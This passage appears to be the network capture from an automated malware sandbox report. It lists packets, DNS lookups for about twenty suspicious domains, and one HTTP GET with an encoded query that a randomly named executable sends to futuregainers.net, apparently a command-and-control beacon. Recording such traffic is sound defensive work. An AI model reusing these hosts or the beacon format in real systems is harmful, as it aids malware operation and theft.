May 30, 2024 15:04:27.197442055 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.197475910 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.197491884 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.197506905 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.197524071 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.197640896 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.197680950 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.197695971 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.197838068 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.197901011 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.197916031 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.197933912 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.197957993 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.197977066 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.197977066 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.198080063 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.198719025 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.198782921 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.198798895 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.198838949 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.198880911 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.198896885 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.199336052 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.199646950 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.199682951 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.199697971 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.199729919 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.199754000 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.199754000 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.199826956 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.200176954 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.200588942 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.202583075 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.202599049 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.203248978 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.287210941 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287249088 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287264109 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287280083 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287295103 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287311077 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287327051 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287334919 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.287364960 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287419081 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287425041 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.287425041 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.287436008 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287461042 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287476063 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287492037 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287507057 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287523031 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287527084 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.287539959 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287578106 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.287597895 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.287597895 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.287751913 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.288044930 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.288060904 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.288074970 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.288096905 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.288150072 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.288166046 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.288182020 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.288202047 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.288202047 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.288207054 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.288225889 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.288239956 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.288254976 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.288275957 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.288275957 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.288981915 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.289051056 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.289088964 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.289103985 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.289118052 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.289130926 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.289146900 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.289150000 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.289171934 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.289191961 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:27.289211035 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.289211035 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.291044950 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.292514086 CEST	49752	80	192.168.2.5	35.214.235.206
May 30, 2024 15:04:27.297357082 CEST	80	49752	35.214.235.206	192.168.2.5
May 30, 2024 15:04:41.033652067 CEST	49753	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:41.038633108 CEST	80	49753	18.178.206.118	192.168.2.5
May 30, 2024 15:04:41.043387890 CEST	49753	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:41.047717094 CEST	49753	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:41.052668095 CEST	80	49753	18.178.206.118	192.168.2.5
May 30, 2024 15:04:41.847141027 CEST	80	49753	18.178.206.118	192.168.2.5
May 30, 2024 15:04:41.847275972 CEST	80	49753	18.178.206.118	192.168.2.5
May 30, 2024 15:04:41.847429991 CEST	49753	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:42.558670044 CEST	49753	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:43.580502987 CEST	49754	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:43.585565090 CEST	80	49754	18.178.206.118	192.168.2.5
May 30, 2024 15:04:43.588470936 CEST	49754	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:43.592360020 CEST	49754	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:43.597302914 CEST	80	49754	18.178.206.118	192.168.2.5
May 30, 2024 15:04:44.390860081 CEST	80	49754	18.178.206.118	192.168.2.5
May 30, 2024 15:04:44.390882969 CEST	80	49754	18.178.206.118	192.168.2.5
May 30, 2024 15:04:44.391258001 CEST	49754	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:45.105597019 CEST	49754	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:46.124649048 CEST	49755	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:46.129877090 CEST	80	49755	18.178.206.118	192.168.2.5
May 30, 2024 15:04:46.129981995 CEST	49755	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:46.132203102 CEST	49755	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:46.137094975 CEST	80	49755	18.178.206.118	192.168.2.5
May 30, 2024 15:04:46.137223959 CEST	80	49755	18.178.206.118	192.168.2.5
May 30, 2024 15:04:46.911997080 CEST	80	49755	18.178.206.118	192.168.2.5
May 30, 2024 15:04:46.912034035 CEST	80	49755	18.178.206.118	192.168.2.5
May 30, 2024 15:04:46.912631035 CEST	49755	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:47.636746883 CEST	49755	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:48.659394979 CEST	49756	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:48.664463997 CEST	80	49756	18.178.206.118	192.168.2.5
May 30, 2024 15:04:48.664551020 CEST	49756	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:48.666326046 CEST	49756	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:48.671200037 CEST	80	49756	18.178.206.118	192.168.2.5
May 30, 2024 15:04:49.448120117 CEST	80	49756	18.178.206.118	192.168.2.5
May 30, 2024 15:04:49.448323965 CEST	80	49756	18.178.206.118	192.168.2.5
May 30, 2024 15:04:49.448801041 CEST	49756	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:49.451355934 CEST	49756	80	192.168.2.5	18.178.206.118
May 30, 2024 15:04:49.456314087 CEST	80	49756	18.178.206.118	192.168.2.5
May 30, 2024 15:04:54.729271889 CEST	49757	80	192.168.2.5	66.96.162.149
May 30, 2024 15:04:54.734318972 CEST	80	49757	66.96.162.149	192.168.2.5
May 30, 2024 15:04:54.734426975 CEST	49757	80	192.168.2.5	66.96.162.149
May 30, 2024 15:04:54.737507105 CEST	49757	80	192.168.2.5	66.96.162.149
May 30, 2024 15:04:54.742403984 CEST	80	49757	66.96.162.149	192.168.2.5
May 30, 2024 15:04:55.220489979 CEST	80	49757	66.96.162.149	192.168.2.5
May 30, 2024 15:04:55.220539093 CEST	80	49757	66.96.162.149	192.168.2.5
May 30, 2024 15:04:55.222196102 CEST	49757	80	192.168.2.5	66.96.162.149
May 30, 2024 15:04:56.246290922 CEST	49757	80	192.168.2.5	66.96.162.149
May 30, 2024 15:04:57.264791012 CEST	49758	80	192.168.2.5	66.96.162.149
May 30, 2024 15:04:57.269839048 CEST	80	49758	66.96.162.149	192.168.2.5
May 30, 2024 15:04:57.270028114 CEST	49758	80	192.168.2.5	66.96.162.149
May 30, 2024 15:04:57.271773100 CEST	49758	80	192.168.2.5	66.96.162.149
May 30, 2024 15:04:57.276659012 CEST	80	49758	66.96.162.149	192.168.2.5
May 30, 2024 15:04:58.780392885 CEST	49758	80	192.168.2.5	66.96.162.149
May 30, 2024 15:04:58.785984993 CEST	80	49758	66.96.162.149	192.168.2.5
May 30, 2024 15:04:58.792203903 CEST	49758	80	192.168.2.5	66.96.162.149
May 30, 2024 15:04:59.796665907 CEST	49759	80	192.168.2.5	66.96.162.149
May 30, 2024 15:04:59.802018881 CEST	80	49759	66.96.162.149	192.168.2.5
May 30, 2024 15:04:59.802128077 CEST	49759	80	192.168.2.5	66.96.162.149
May 30, 2024 15:04:59.804445982 CEST	49759	80	192.168.2.5	66.96.162.149
May 30, 2024 15:04:59.809441090 CEST	80	49759	66.96.162.149	192.168.2.5
May 30, 2024 15:04:59.809690952 CEST	80	49759	66.96.162.149	192.168.2.5
May 30, 2024 15:05:00.303379059 CEST	80	49759	66.96.162.149	192.168.2.5
May 30, 2024 15:05:00.303546906 CEST	80	49759	66.96.162.149	192.168.2.5
May 30, 2024 15:05:00.303616047 CEST	49759	80	192.168.2.5	66.96.162.149
May 30, 2024 15:05:01.312223911 CEST	49759	80	192.168.2.5	66.96.162.149
May 30, 2024 15:05:02.329015017 CEST	49760	80	192.168.2.5	66.96.162.149
May 30, 2024 15:05:02.334139109 CEST	80	49760	66.96.162.149	192.168.2.5
May 30, 2024 15:05:02.334233999 CEST	49760	80	192.168.2.5	66.96.162.149
May 30, 2024 15:05:02.336328983 CEST	49760	80	192.168.2.5	66.96.162.149
May 30, 2024 15:05:02.341419935 CEST	80	49760	66.96.162.149	192.168.2.5
May 30, 2024 15:05:02.818444014 CEST	80	49760	66.96.162.149	192.168.2.5
May 30, 2024 15:05:02.818540096 CEST	80	49760	66.96.162.149	192.168.2.5
May 30, 2024 15:05:02.821455002 CEST	49760	80	192.168.2.5	66.96.162.149
May 30, 2024 15:05:02.821455002 CEST	49760	80	192.168.2.5	66.96.162.149
May 30, 2024 15:05:02.826498985 CEST	80	49760	66.96.162.149	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 30, 2024 15:01:48.386440039 CEST	51774	53	192.168.2.5	1.1.1.1
May 30, 2024 15:01:48.737673044 CEST	53	51774	1.1.1.1	192.168.2.5
May 30, 2024 15:01:53.749414921 CEST	56340	53	192.168.2.5	1.1.1.1
May 30, 2024 15:01:53.872217894 CEST	53	56340	1.1.1.1	192.168.2.5
May 30, 2024 15:02:09.500122070 CEST	62031	53	192.168.2.5	1.1.1.1
May 30, 2024 15:02:09.820105076 CEST	53	62031	1.1.1.1	192.168.2.5
May 30, 2024 15:02:23.280358076 CEST	52707	53	192.168.2.5	1.1.1.1
May 30, 2024 15:02:23.530972958 CEST	53	52707	1.1.1.1	192.168.2.5
May 30, 2024 15:02:36.953695059 CEST	62732	53	192.168.2.5	1.1.1.1
May 30, 2024 15:02:37.246059895 CEST	53	62732	1.1.1.1	192.168.2.5
May 30, 2024 15:02:51.082464933 CEST	49367	53	192.168.2.5	1.1.1.1
May 30, 2024 15:02:52.098411083 CEST	49367	53	192.168.2.5	1.1.1.1
May 30, 2024 15:02:52.155904055 CEST	53	49367	1.1.1.1	192.168.2.5
May 30, 2024 15:02:52.155972958 CEST	53	49367	1.1.1.1	192.168.2.5
May 30, 2024 15:03:05.971777916 CEST	61625	53	192.168.2.5	1.1.1.1
May 30, 2024 15:03:05.982407093 CEST	53	61625	1.1.1.1	192.168.2.5
May 30, 2024 15:03:14.047091961 CEST	60347	53	192.168.2.5	1.1.1.1
May 30, 2024 15:03:14.065601110 CEST	53	60347	1.1.1.1	192.168.2.5
May 30, 2024 15:03:27.408291101 CEST	50946	53	192.168.2.5	1.1.1.1
May 30, 2024 15:03:27.965801954 CEST	53	50946	1.1.1.1	192.168.2.5
May 30, 2024 15:03:41.188150883 CEST	54314	53	192.168.2.5	1.1.1.1
May 30, 2024 15:03:41.701337099 CEST	53	54314	1.1.1.1	192.168.2.5
May 30, 2024 15:03:54.999063969 CEST	63092	53	192.168.2.5	1.1.1.1
May 30, 2024 15:03:55.025969982 CEST	53	63092	1.1.1.1	192.168.2.5
May 30, 2024 15:04:03.082434893 CEST	52472	53	192.168.2.5	1.1.1.1
May 30, 2024 15:04:04.092236996 CEST	52472	53	192.168.2.5	1.1.1.1
May 30, 2024 15:04:05.108021021 CEST	52472	53	192.168.2.5	1.1.1.1
May 30, 2024 15:04:05.247225046 CEST	53	52472	1.1.1.1	192.168.2.5
May 30, 2024 15:04:05.247272015 CEST	53	52472	1.1.1.1	192.168.2.5
May 30, 2024 15:04:05.247302055 CEST	53	52472	1.1.1.1	192.168.2.5
May 30, 2024 15:04:18.573082924 CEST	53555	53	192.168.2.5	1.1.1.1
May 30, 2024 15:04:18.592904091 CEST	53	53555	1.1.1.1	192.168.2.5
May 30, 2024 15:04:32.296632051 CEST	52152	53	192.168.2.5	1.1.1.1
May 30, 2024 15:04:32.306736946 CEST	53	52152	1.1.1.1	192.168.2.5
May 30, 2024 15:04:40.361118078 CEST	54399	53	192.168.2.5	1.1.1.1
May 30, 2024 15:04:41.027465105 CEST	53	54399	1.1.1.1	192.168.2.5
May 30, 2024 15:04:54.469530106 CEST	53815	53	192.168.2.5	1.1.1.1
May 30, 2024 15:04:54.726003885 CEST	53	53815	1.1.1.1	192.168.2.5
May 30, 2024 15:05:11.248362064 CEST	51543	53	192.168.2.5	1.1.1.1
May 30, 2024 15:05:11.598326921 CEST	53	51543	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
May 30, 2024 15:01:48.386440039 CEST	192.168.2.5	1.1.1.1	0x6ea1	Standard query (0)	www.fr2e4o.cfd	A (IP address)	IN (0x0001)	false
May 30, 2024 15:01:53.749414921 CEST	192.168.2.5	1.1.1.1	0x1544	Standard query (0)	www.futuregainers.net	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:09.500122070 CEST	192.168.2.5	1.1.1.1	0xf741	Standard query (0)	www.shopnow321.online	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:23.280358076 CEST	192.168.2.5	1.1.1.1	0x3af9	Standard query (0)	www.klimkina.pro	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:36.953695059 CEST	192.168.2.5	1.1.1.1	0x7335	Standard query (0)	www.shahaf3d.com	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:51.082464933 CEST	192.168.2.5	1.1.1.1	0x6c7d	Standard query (0)	www.againbeautywhiteskin.asia	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:52.098411083 CEST	192.168.2.5	1.1.1.1	0x6c7d	Standard query (0)	www.againbeautywhiteskin.asia	A (IP address)	IN (0x0001)	false
May 30, 2024 15:03:05.971777916 CEST	192.168.2.5	1.1.1.1	0xb929	Standard query (0)	www.homeppower.com	A (IP address)	IN (0x0001)	false
May 30, 2024 15:03:14.047091961 CEST	192.168.2.5	1.1.1.1	0x9649	Standard query (0)	www.lenovest.xyz	A (IP address)	IN (0x0001)	false
May 30, 2024 15:03:27.408291101 CEST	192.168.2.5	1.1.1.1	0x24db	Standard query (0)	www.931951.com	A (IP address)	IN (0x0001)	false
May 30, 2024 15:03:41.188150883 CEST	192.168.2.5	1.1.1.1	0xc9aa	Standard query (0)	www.srripaspocon.org	A (IP address)	IN (0x0001)	false
May 30, 2024 15:03:54.999063969 CEST	192.168.2.5	1.1.1.1	0xec9	Standard query (0)	www.x5hh186z.skin	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:03.082434893 CEST	192.168.2.5	1.1.1.1	0x542e	Standard query (0)	www.torentreprenad.com	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:04.092236996 CEST	192.168.2.5	1.1.1.1	0x542e	Standard query (0)	www.torentreprenad.com	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:05.108021021 CEST	192.168.2.5	1.1.1.1	0x542e	Standard query (0)	www.torentreprenad.com	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:18.573082924 CEST	192.168.2.5	1.1.1.1	0xa816	Standard query (0)	www.grecanici.com	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:32.296632051 CEST	192.168.2.5	1.1.1.1	0x156b	Standard query (0)	www.navigate-power.boats	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:40.361118078 CEST	192.168.2.5	1.1.1.1	0x4b4c	Standard query (0)	www.93v0.com	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:54.469530106 CEST	192.168.2.5	1.1.1.1	0x6c91	Standard query (0)	www.leadchanges.info	A (IP address)	IN (0x0001)	false
May 30, 2024 15:05:11.248362064 CEST	192.168.2.5	1.1.1.1	0x994b	Standard query (0)	www.fr2e4o.cfd	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
May 30, 2024 15:01:48.737673044 CEST	1.1.1.1	192.168.2.5	0x6ea1	Name error (3)	www.fr2e4o.cfd	none	none	A (IP address)	IN (0x0001)	false
May 30, 2024 15:01:53.872217894 CEST	1.1.1.1	192.168.2.5	0x1544	No error (0)	www.futuregainers.net	futuregainers.net		CNAME (Canonical name)	IN (0x0001)	false
May 30, 2024 15:01:53.872217894 CEST	1.1.1.1	192.168.2.5	0x1544	No error (0)	futuregainers.net		195.35.39.119	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:09.820105076 CEST	1.1.1.1	192.168.2.5	0xf741	No error (0)	www.shopnow321.online	shopnow321.online		CNAME (Canonical name)	IN (0x0001)	false
May 30, 2024 15:02:09.820105076 CEST	1.1.1.1	192.168.2.5	0xf741	No error (0)	shopnow321.online		162.241.2.254	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:23.530972958 CEST	1.1.1.1	192.168.2.5	0x3af9	No error (0)	www.klimkina.pro		185.137.235.125	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:23.530972958 CEST	1.1.1.1	192.168.2.5	0x3af9	No error (0)	www.klimkina.pro		185.137.235.192	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:23.530972958 CEST	1.1.1.1	192.168.2.5	0x3af9	No error (0)	www.klimkina.pro		185.137.235.103	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:23.530972958 CEST	1.1.1.1	192.168.2.5	0x3af9	No error (0)	www.klimkina.pro		185.137.235.193	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:23.530972958 CEST	1.1.1.1	192.168.2.5	0x3af9	No error (0)	www.klimkina.pro		185.137.235.77	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:37.246059895 CEST	1.1.1.1	192.168.2.5	0x7335	No error (0)	www.shahaf3d.com	shahaf3d.com		CNAME (Canonical name)	IN (0x0001)	false
May 30, 2024 15:02:37.246059895 CEST	1.1.1.1	192.168.2.5	0x7335	No error (0)	shahaf3d.com		64.46.118.35	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:52.155904055 CEST	1.1.1.1	192.168.2.5	0x6c7d	No error (0)	www.againbeautywhiteskin.asia	dns.ladipage.com		CNAME (Canonical name)	IN (0x0001)	false
May 30, 2024 15:02:52.155904055 CEST	1.1.1.1	192.168.2.5	0x6c7d	No error (0)	dns.ladipage.com		54.179.173.60	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:52.155904055 CEST	1.1.1.1	192.168.2.5	0x6c7d	No error (0)	dns.ladipage.com		13.228.81.39	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:52.155904055 CEST	1.1.1.1	192.168.2.5	0x6c7d	No error (0)	dns.ladipage.com		18.139.62.226	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:52.155972958 CEST	1.1.1.1	192.168.2.5	0x6c7d	No error (0)	www.againbeautywhiteskin.asia	dns.ladipage.com		CNAME (Canonical name)	IN (0x0001)	false
May 30, 2024 15:02:52.155972958 CEST	1.1.1.1	192.168.2.5	0x6c7d	No error (0)	dns.ladipage.com		54.179.173.60	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:52.155972958 CEST	1.1.1.1	192.168.2.5	0x6c7d	No error (0)	dns.ladipage.com		13.228.81.39	A (IP address)	IN (0x0001)	false
May 30, 2024 15:02:52.155972958 CEST	1.1.1.1	192.168.2.5	0x6c7d	No error (0)	dns.ladipage.com		18.139.62.226	A (IP address)	IN (0x0001)	false
May 30, 2024 15:03:05.982407093 CEST	1.1.1.1	192.168.2.5	0xb929	Name error (3)	www.homeppower.com	none	none	A (IP address)	IN (0x0001)	false
May 30, 2024 15:03:14.065601110 CEST	1.1.1.1	192.168.2.5	0x9649	No error (0)	www.lenovest.xyz		162.0.213.94	A (IP address)	IN (0x0001)	false
May 30, 2024 15:03:27.965801954 CEST	1.1.1.1	192.168.2.5	0x24db	No error (0)	www.931951.com		172.82.177.221	A (IP address)	IN (0x0001)	false
May 30, 2024 15:03:41.701337099 CEST	1.1.1.1	192.168.2.5	0xc9aa	No error (0)	www.srripaspocon.org	srripaspocon.org		CNAME (Canonical name)	IN (0x0001)	false
May 30, 2024 15:03:41.701337099 CEST	1.1.1.1	192.168.2.5	0xc9aa	No error (0)	srripaspocon.org		15.204.0.108	A (IP address)	IN (0x0001)	false
May 30, 2024 15:03:55.025969982 CEST	1.1.1.1	192.168.2.5	0xec9	Name error (3)	www.x5hh186z.skin	none	none	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:05.247225046 CEST	1.1.1.1	192.168.2.5	0x542e	No error (0)	www.torentreprenad.com		194.9.94.86	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:05.247225046 CEST	1.1.1.1	192.168.2.5	0x542e	No error (0)	www.torentreprenad.com		194.9.94.85	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:05.247272015 CEST	1.1.1.1	192.168.2.5	0x542e	No error (0)	www.torentreprenad.com		194.9.94.86	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:05.247272015 CEST	1.1.1.1	192.168.2.5	0x542e	No error (0)	www.torentreprenad.com		194.9.94.85	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:05.247302055 CEST	1.1.1.1	192.168.2.5	0x542e	No error (0)	www.torentreprenad.com		194.9.94.86	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:05.247302055 CEST	1.1.1.1	192.168.2.5	0x542e	No error (0)	www.torentreprenad.com		194.9.94.85	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:18.592904091 CEST	1.1.1.1	192.168.2.5	0xa816	No error (0)	www.grecanici.com		35.214.235.206	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:32.306736946 CEST	1.1.1.1	192.168.2.5	0x156b	Name error (3)	www.navigate-power.boats	none	none	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:41.027465105 CEST	1.1.1.1	192.168.2.5	0x4b4c	No error (0)	www.93v0.com		18.178.206.118	A (IP address)	IN (0x0001)	false
May 30, 2024 15:04:54.726003885 CEST	1.1.1.1	192.168.2.5	0x6c91	No error (0)	www.leadchanges.info		66.96.162.149	A (IP address)	IN (0x0001)	false
May 30, 2024 15:05:11.598326921 CEST	1.1.1.1	192.168.2.5	0x994b	Name error (3)	www.fr2e4o.cfd	none	none	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

www.futuregainers.net

www.shopnow321.online

www.klimkina.pro

www.shahaf3d.com

www.againbeautywhiteskin.asia

www.lenovest.xyz

www.931951.com

www.srripaspocon.org

www.torentreprenad.com

www.grecanici.com

www.93v0.com

www.leadchanges.info

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49715	195.35.39.119	80	6428	C:\Program Files (x86)\gBJTaDntZgEdtxjRNefvmnBFXiYgDKOPRytPNXvq\ISsofSsdrAsp.exe

Timestamp	Bytes transferred	Direction	Data
May 30, 2024 15:01:53.884972095 CEST	443	OUT	GET /l4k7/?I2ID3h=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+Wm9/sLy/+6kwKxmizhSXMLRmEd0k89wM5PzrnuS1OcOQUw==&aN6=3TWTWTzxVTU HTTP/1.1 Host: www.futuregainers.net Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; TNJB; rv:11.0) like Gecko
May 30, 2024 15:01:54.452708006 CEST	1226	IN	HTTP/1.1 301 Moved Permanently Connection: close content-type: text/html content-length: 795 date: Thu, 30 May 2024 13:01:54 GMT server: LiteSpeed location: https://www.futuregainers.net/l4k7/?I2ID3h=afjyNtLybwItDht5F4JWljDwa9eg0AOKeO4XK5PuceGx/XGrL/B5lBywYHYqMzQc+iQ+00df400Ki5pEb+b+Wm9/sLy/+6kwKxmizhSXMLRmEd0k89wM5PzrnuS1OcOQUw==&aN6=3TWTWTzxVTU platform: hostinger content-security-policy: upgrade-insecure-requests Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 